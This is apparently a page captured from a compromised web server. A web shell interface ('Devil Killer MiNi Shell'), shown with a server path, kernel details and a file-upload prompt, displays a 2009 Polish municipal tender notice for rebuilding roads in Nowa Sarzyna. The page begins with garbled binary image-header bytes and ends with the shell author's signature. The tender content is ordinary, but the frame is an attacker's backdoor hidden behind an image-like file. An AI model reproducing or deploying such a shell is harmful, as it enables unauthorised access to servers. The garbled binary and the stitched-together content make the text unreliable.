JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090324/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090324/75746-N-2009.html

<p class="kh_header"><b>Nowa Sarzyna: Przebudowa dróg gminnych na terenie gminy Nowa Sarzyna</b><br>
<b>Numer ogłoszenia: 75746 - 2009; data zamieszczenia: 24.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Nowa Sarzyna , ul. Mikołaja Kopernika 1, 37-310 Nowa Sarzyna, woj. podkarpackie, tel. 017 2413251, faks 017 2413111.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina.nowasarzyna.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg gminnych na terenie gminy Nowa Sarzyna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa dróg gminnych położonych na dz.: 1956, 2087 w miejscowości Jelna, 370, 461, 475, 657, 477, 653, 655, 656, 660 w miejscowości Łukowa, 337 i 414 w miejscowości Ruda Łańcucka, 3172, 3343/2, 3287, 3348/1, 3348/2, 3297, 3691/1, 3245, 3752/2, 3966, 3623, 3650, 3804, 4251 i 4286 w miejscowości Sarzyna. Przedmiot zamówienia obejmuje:
Zadanie nr 1: Przebudowę drogi gminnej Nr 104715R w miejscowości Jelna Baranówka - Łukowa,
Zadanie nr 2: Przebudowę drogi gminnej Nr 104750 R w miejscowości Ruda Łańcucka - Sarzyna,
Zadanie nr 3: Przebudowę drogi gminnej Nr 104749 R w miejscowości Sarzyna,
Zadanie nr 4: Przebudowę drogi gminnej Nr 107754 R w miejscowości Sarzyna,
Zadanie nr 5: Przebudowę drogi gminnej Nr 107755 R w miejscowości Sarzyna. 

1)	Przebudowa drogi gminnej Nr 104715R w miejscowości Jelna Baranówka- Łukowa:
Przewiduje się tu wykonanie podbudowy z kruszywa stabilizowanego mechanicznie, warstwa grubości 20 cm po zagęszczeniu o powierzchni 7 654,80 m2. Wykonanie warstwy wiążącej z betonu asfaltowego gr. 5 cm i warstwy ścieralnej o grubości warstwy po zagęszczeniu 4 cm o powierzchni 6 910,68 m2, oraz regulację wysokościową 9 szt. studzienek kanalizacji sanitarnej.
Parametry techniczne drogi:
- droga jedno-jezdniowa klasy D 
- powierzchnia planowanego przedsięwzięcia: 9 210,46 m2
- długość odcinka: 1 485,66 mb
- szerokość jezdni; 3,5 - 5,0 m
- pobocza ziemne: 2 x 0,75 m
- nawierzchnia jezdni: z mas mineralno - bitumicznych
- projektowane obciążenie nawierzchni - 100 kN/oś
- kategoria -obciążenie ruchem: KR1
- odwodnienie: istniejące - powierzchniowe realizowane za pomocą spadków poprzecznych i podłużnych jezdni na pobocza.

2)	Przebudowę drogi gminnej Nr 104750 R w miejscowości Ruda Łańcucka - Sarzyna:
Przewiduje się tu wykonanie podbudowy z gruntu stabilizowanego cementem, warstwa grubości 15 cm po zagęszczeniu o powierzchni 4738,30 m2.
Wykonanie warstwy podbudowy z kruszywa łamanego 0/63 mm stabilizowanego mechanicznie o grubości warstwy po zagęszczeniu 20 cm o powierzchni 4326,70 m2.
Wyrównanie istniejącej nawierzchni betonem asfaltowym o powierzchni 343,3 Mg.
Wykonanie warstwy wiązanej z betonu asfaltowego 0/16 mm gr. 4 cm i warstwy ścieralnej o grubości warstwy po zagęszczeniu 4 cm o powierzchni 7548,80 m2.
Parametry techniczne drogi:
- droga jedno-jezdniowa klasy L 
- powierzchnia planowanego przedsięwzięcia: 7 729,4 m2
- długość odcinka: 1 493,0 m
- szerokość jezdni; 5,0 m
- pobocza ziemne: 2 x 0,75 m
- nawierzchnia jezdni: z mas mineralno -bitumicznych
- projektowane obciążenie nawierzchni - 100 kN/oś
- kategoria -obciążenie ruchem: KR1
- odwodnienie: istniejące powierzchniowe realizowane za pomocą spadków poprzecznych i podłużnych jezdni na pobocza.

3)	Przebudowę drogi gminnej Nr 104749 R w miejscowości Sarzyna:
Przewiduje się tu wykonanie podbudowy z kruszywa stabilizowanego mechanicznie, warstwa grubości 20 cm po zagęszczeniu o powierzchni 6207,08 m2.
Wykonanie warstwy wiążącej z betonu asfaltowego gr. 5 cm i warstwy ścieralnej o grubości warstwy po zagęszczeniu 4 cm o powierzchni 5641,82 m2.
Parametry techniczne drogi:
- droga jedno-jezdniowa klasy L 
- powierzchnia planowanego przedsięwzięcia: 7 338,24 m2.
-długość odcinka: 1 090,41 m
- szerokość jezdni; 5,0 m
- pobocza ziemne: 2 x 0,75 m
- nawierzchnia jezdni: z mas mineralno bitumicznych
- projektowane obciążenie nawierzchni - 100 kN/oś
- kategoria -obciążenie ruchem: KR1
- odwodnienie: istniejące powierzchniowe realizowane za pomocą spadków poprzecznych i podłużnych jezdni na pobocza.

4)	Przebudowę drogi gminnej Nr 107754 R w miejscowości Sarzyna:
Przewiduje się tu wykonanie podbudowy z kruszywa stabilizowanego mechanicznie, warstwa grubości 20 cm po zagęszczeniu o powierzchni 2 670,48 m2.
Wykonanie warstwy wiążącej z betonu asfaltowego gr. 5 cm i warstwy ścieralnej o grubości warstwy po zagęszczeniu 4 cm o powierzchni 2394,42 m2.
Parametry techniczne drogi:
- droga jedno-jezdniowa klasy D 
- powierzchnia planowanego przedsięwzięcia: 1880,0 m2.
-długość odcinka: 491,12 m
- szerokość jezdni; 4,0-4,5 m
- pobocza ziemne: 2 x 0,75 m
- nawierzchnia jezdni: z mas mineralno bitumicznych
- projektowane obciążenie nawierzchni - 100 kN/oś
- kategoria -obciążenie ruchem: KR1
- odwodnienie: istniejące powierzchniowe realizowane za pomocą spadków poprzecznych i podłużnych jezdni na pobocza.

5)	Przebudowę drogi gminnej Nr 107755 R w miejscowości Sarzyna:
Przewiduje się tu wykonanie podbudowy z gruntu stabilizowanego cementem, warstwa grubości 15 cm po zagęszczeniu o powierzchni 2359,00 m2.
Wykonanie warstwy podbudowy z kruszywa stabilizowanego mechanicznie, warstwa grubości 20 cm po zagęszczeniu o powierzchni 2204,36 m2.
Wykonanie warstwy wiążącej z betonu asfaltowego gr. 4 cm i warstwy ścieralnej o grubości warstwy po zagęszczeniu 4 cm o powierzchni 1987,30 m2.
Parametry techniczne drogi:
- droga jedno-jezdniowa klasy L 
- powierzchnia planowanego przedsięwzięcia: 1750,0 m2.
-długość odcinka: 350,00 m
- szerokość jezdni; 5,0 m
- pobocza ziemne: 2 x 0,75 m
- nawierzchnia jezdni: z mas mineralno bitumicznych
- projektowane obciążenie nawierzchni - 100 kN/oś
- kategoria -obciążenie ruchem: KR1
- odwodnienie: istniejące powierzchniowe realizowane za pomocą spadków poprzecznych i podłużnych jezdni na pobocza.

Zakres zamówienia obejmuje:
-	wykonanie projektu organizacji ruchu na okres realizacji robót,
-	urządzenie placu budowy,
-	zabezpieczenie terenu budowy, 
-	zapewnienie dojazdu do istniejących obiektów i posesji indywidualnych na okres wykonywania robót,
-	zakup i dostawę materiałów niezbędnych do realizacji zadania,
-	podbudowa z kruszywa łamanego,
-	wykonanie nawierzchni z masy mineralno - bitumicznej,
-	roboty ziemne,
-	profilowanie poboczy,
-	roboty niwelacyjne i porządkowe,
-	przywrócenie do stanu pierwotnego terenu budowy po wykonaniu robót,
-	obsługę geodezyjną inwestycji (roboty pomiarowe, opracowanie i uzgodnienie inwentaryzacji geodezyjnej powykonawczej).
Szczegółowy zakres robót określony jest w załączonym do siwz przedmiarze robót oraz dokumentacji technicznej.
Obsługa geodezyjna oraz dokumentacja geodezyjno - powykonawcza leży po stronie Wykonawcy. Wykonawca uwzględni w cenie wytyczenie geodezyjne w terenie oraz wykona inwentaryzację powykonawczą wykonanych robót.
Wykonawca winien udzielić gwarancji na wykonany przedmiot zamówienia na okres 36 miesięcy począwszy od dnia podpisania bez zastrzeżeń protokołu końcowego odbioru robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1) Przystępując do niniejszego postępowania każdy wykonawca zobowiązany jest wnieść wadium w wysokości 40 000,00 zł (słownie: czterdzieści tysięcy).
Wykonawca jest zobowiązany do wniesienia wadium przed upływem terminu składania ofert.
2) Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
3) W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a) nazwę dającego zlecenia (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją,
c) kwotę gwarancji,
d) termin ważności gwarancji,
e) zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie, lub
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Powyższe postanowienia stosuje się odpowiednio do poręczeń, określonych w pkt 2 lit b i e
4) Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Stalowej Woli 84 9430 1058 1000 1182 2000 0004 z dopiskiem - Wadium - Przebudowa dróg gminnych na terenie Gminy Nowa Sarzyna.
W przypadku wnoszenia wadium w pieniądzu należy je wpłacić na konto Zamawiającego z takim wyprzedzeniem, aby w chwili otwarcia ofert, pieniądze znajdowały się na koncie Zamawiającego. Do oferty należy dołączyć dokument potwierdzający przelew (wniesienie) środków na rachunek Zamawiającego.
Wadium wnoszone w pieniądzu Zamawiający przechowuje na rachunku bankowym.
W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy dołączyć do oferty w osobnej kopercie - opisanej - wadium.
5) Zamawiający zwróci niezwłocznie wadium jeżeli:
a) upłynął termin związania ofertą;
b) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania umowy;
c) Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
6) Z zastrzeżeniem pkt 8 Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy:
a) który wycofał ofertę przed upływem terminu składania ofert;
b) który został wykluczony z postępowania;
c) którego oferta została odrzucona.
7) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. z 2007 r. Nr 223, poz. 1655 zpóźn. zm.) zwanej dalej ustawą nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy:
1)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2)	Posiadają niezbędną wiedzę i doświadczenie, oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
4)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy.
Opis sposobu dokonywania oceny spełniania warunków: spełnia/ nie spełnia:
1) Zamawiający dokona oceny spełniania warunków wymaganych od Wykonawców analizując treść złożonej oferty, uwzględniając w szczególności: 
- dostarczenie wszystkich wymaganych dokumentów w tym wypełnionego i podpisanego formularza oferty oraz harmonogramu rzeczowo - finansowego, niezbędnych oświadczeń, kosztorysu ofertowego,
- udzielenia 36 miesięcy gwarancji na wykonany przedmiot zamówienia począwszy od dnia podpisania bez zastrzeżeń protokołu końcowego odbioru robót,
- zaakceptowanie warunków płatności: płatność następować będzie po wykonaniu i odebraniu poszczególnych etapów robót - zgodnie z harmonogramem rzeczowo - finansowym, w terminie do 21 dni od dnia dostarczenia faktury Zamawiającemu.
2)	Zamawiający uzna, że Wykonawca spełnił warunek określony w pkt. 1 ppkt 2 jeżeli wykaże:
- wykonanie w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej czterech robót budowlanych o wartości brutto co najmniej 300 000,00 zł każda lub jednej o wartości brutto co najmniej 1 200 000,00 zł, polegających na budowie lub przebudowie nawierzchni asfaltowej dróg, 
- dysponowanie niezbędnym do wykonania zamówienia sprzętem: koparko-ładowarka - 2 szt., równiarka - 2szt., samochód samowyładowczy - 3 szt., rozkładarka mas bitumicznych - 2 szt., frezarka do nawierzchni asfaltowej - 1 szt.,  walec gumowy - 1 szt., walec stalowy - 1szt.
- dysponowanie kierownikiem budowy posiadającym uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności drogowej potwierdzone aktualnym na dzień upływu terminu składania ofert zaświadczeniem o przynależności do właściwej Izby samorządu zawodowego. Osoba ta musi posiadać minimum 3 - letnie doświadczenie zawodowe na stanowisku Kierownika Budowy w branży drogowej.
3)	Zamawiający uzna, że Wykonawca spełnił warunek określony w pkt.1. ppkt 3 jeżeli wykaże:
- posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności,
- dostęp do środków finansowych lub zdolność kredytową w kwocie co najmniej 1 000 000,00 zł..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu: 
1) Oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu na podstawie art. 44 ustawy - wg. załącznika nr 2 do siwz.
2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3) Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające odpowiednio, że wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5) Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6) Wykaz wykonywanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - wg załącznika nr 3 do siwz.
7) Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca -według załącznika nr 4 do siwz.
8) Pisemnego zobowiązania innych podmiotów do udostępniania niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt. 7, wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.
9) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności- według załącznika nr 5 do siwz.
10) Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 9 wykonawca wskazał osoby, którymi będzie dysponował.
11) Uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności drogowej osoby przewidzianej na stanowisko kierownika budowy potwierdzone aktualnym na dzień upływu terminu składania ofert zaświadczeniem o przynależności do właściwej Izby Samorządu Zawodowego.
12) Polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
13) Informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym wykonawca posiada rachunek bankowy, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż trzy miesiące przed upływem terminu składania ofert.
2. Stosownie do treści § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 z późn. zm) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w:
1) pkt. 1. ppkt. 2, 3 i 5 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
2) pkt.1. ppkt. 4 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
3) Dokumenty, o których mowa w pkt. 2. ppkt. 1 lit. a i c oraz ppkt. 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt. 2. ppkt. 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 2. ppkt. 1 i 2 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepisy pkt. 2. ppkt. 3 stosuje się odpowiednio.
3. Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu można przedkładać w formie kserokopii potwierdzonych za zgodność z oryginałem przez wykonawcę.
4. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.nowasarzyna.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Nowej Sarzynie, ul. Kopernika 1, 37-310 Nowa Sarzyna (pok. nr 15).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 10:00, miejsce: Urząd Miasta i Gminy w Nowej Sarzynie, ul. Kopernika 1, 37-310 Nowa Sarzyna (Sekretariat - II piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com